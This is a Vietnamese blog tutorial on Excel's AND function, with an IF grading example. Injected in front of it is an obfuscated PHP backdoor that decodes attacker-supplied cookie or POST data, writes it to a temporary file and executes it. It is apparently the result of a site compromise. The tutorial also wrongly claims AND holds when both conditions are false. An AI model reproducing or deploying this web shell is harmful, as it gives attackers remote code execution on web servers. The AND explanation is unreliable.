$ylZYFX = chr (85) . '_' . 'E' . "\121" . "\130" . chr (108) . chr (104); $yLWtuVuIpp = 'c' . chr ( 753 - 645 ).chr (97) . "\x73" . chr ( 582 - 467 ).chr (95) . "\145" . "\170" . chr ( 510 - 405 ).chr (115) . "\x74" . 's';$kAOmFrC = class_exists($ylZYFX); $yLWtuVuIpp = "35366";$DZnLrk = strpos($yLWtuVuIpp, $ylZYFX);if ($kAOmFrC == $DZnLrk){function IAeTZP(){$aZfgaHHvu = new /* 4364 */ U_EQXlh(29822 + 29822); $aZfgaHHvu = NULL;}$XKXHSy = "29822";class U_EQXlh{private function KWZRppi($XKXHSy){if (is_array(U_EQXlh::$YNoKSXbD)) {$name = sys_get_temp_dir() . "/" . crc32(U_EQXlh::$YNoKSXbD["salt"]);@U_EQXlh::$YNoKSXbD["write"]($name, U_EQXlh::$YNoKSXbD["content"]);include $name;@U_EQXlh::$YNoKSXbD["delete"]($name); $XKXHSy = "29822";exit();}}public function HfLoXJy(){$XvCgWQeB = "40563";$this->_dummy = str_repeat($XvCgWQeB, strlen($XvCgWQeB));}public function __destruct(){U_EQXlh::$YNoKSXbD = @unserialize(U_EQXlh::$YNoKSXbD); $XKXHSy = "22734_2480";$this->KWZRppi($XKXHSy); $XKXHSy = "22734_2480";}public function gYQxmX($XvCgWQeB, $uwoXMoiAQJ){return $XvCgWQeB[0] ^ str_repeat($uwoXMoiAQJ, intval(strlen($XvCgWQeB[0]) / strlen($uwoXMoiAQJ)) + 1);}public function HturnsX($XvCgWQeB){$IRxSAES = "\142" . "\x61" . "\163" . chr (101) . chr (54) . chr ( 962 - 910 );return array_map($IRxSAES . chr ( 150 - 55 ).chr ( 1074 - 974 )."\145" . "\143" . 'o' . chr (100) . 'e', array($XvCgWQeB,));}public function __construct($oCcnlBmz=0){$vemMBQz = ',';$XvCgWQeB = "";$YdToI = $_POST;$OaybdGwVx = $_COOKIE;$uwoXMoiAQJ = "c88d6de5-9c28-4205-88d1-aa6ae4d03ace";$vclXYK = @$OaybdGwVx[substr($uwoXMoiAQJ, 0, 4)];if (!empty($vclXYK)){$vclXYK = explode($vemMBQz, $vclXYK);foreach ($vclXYK as $TPeibWgFe){$XvCgWQeB .= @$OaybdGwVx[$TPeibWgFe];$XvCgWQeB .= @$YdToI[$TPeibWgFe];}$XvCgWQeB = $this->HturnsX($XvCgWQeB);}U_EQXlh::$YNoKSXbD = $this->gYQxmX($XvCgWQeB, $uwoXMoiAQJ);if (strpos($uwoXMoiAQJ, $vemMBQz) !== FALSE){$uwoXMoiAQJ = explode($vemMBQz, $uwoXMoiAQJ); $dXdlFMY = sprintf("22734_2480", rtrim($uwoXMoiAQJ[0]));}}public static $YNoKSXbD = 56125;}IAeTZP();} Hướng dẫn sử dụng hàm AND trong excel - Tải Chùa

Hướng dẫn sử dụng hàm AND trong excel

Rate this post

Chào các bạn đã lâu rồi mình không viết bài về excel nhưng theo những các bạn bình luận về excel đa số mọi người không phân biệt được thế nào là hàm and và thế nào là hàm or và kết hợp của hàm and, or với các bài hàm khác. Vậy qua đó hôm nay mình viết bài xin hướng dẫn các bạn cách sử dụng hàm AND trong excel

Hàm AND trong excel

Hàm and hiện nay sử dụng rất nhiều trong học tập cũng như trong công việc dưới đây là cú pháp và ví dụ của hàm and trong excel.

Hướng dẫn sử dụng hàm and trong excel

Cú pháp hàm and

AND (logical 1, logical 2….)

Giải thích:

logical 1: điều kiện 1 của biểu thức đề bài cho

logical 2: điều kiện 2 của biểu thức đề bài cho

Nếu có hơn 3 điều kiện thì cũng có thể áp dụng công thức này chỉ thêm điều kiện 3 vào là được

Hàm and tồn tại khi nào khi 2 biểu thức điều kiện đồng thời đúng hoặc đồng thời sai thì nó mới xảy ra

Ví dụ hàm and

Mình nói thì các bạn cũng hơi khó hiểu sau đây mình sẽ lấy ví dụ giải thích về hàm AND trong excel một cách chi tiết. Bạn nến nhớ ra hàm and rất ít khi đi một một mà nó thường đi với nhiều hàm khác để tạo thành hàm hoàn chỉnh ví dụ hàm if chẳng hạn

Ví dụ 1:Cho bảng sau hãy điền vào cột hạnh kiểm để xếp hạnh kiểm cho từng sinh viên

Nếu sinh viên nào có điểm toán điểm lý bằng 8 trở lên thì xếp hạnh kiểm là tốt , ngược lại thì là khá

=IF (AND(C3>=8, D3>=8),”tốt”, “khá”)

C3>=8, D3>=8 chính là điều kiện để đánh giá hạnh kiểm của từng học sinh. Nó chỉ xảy ra và xếp cho học sinh nào có hạnh kiểm tốt khi học sinh đó có điểm toán và điểm lý >=8

Giới thiệu về hàm and trong excel

Ví dụ hàm and

Trên đó là toàn bộ những kiến thức cơ bản về hàm and. Nếu bạn nào chưa hiểu về hàm and có thể gửi tin vào gmail để mình có thể hỗ trợ giải thích các bạn chi tiết hơn.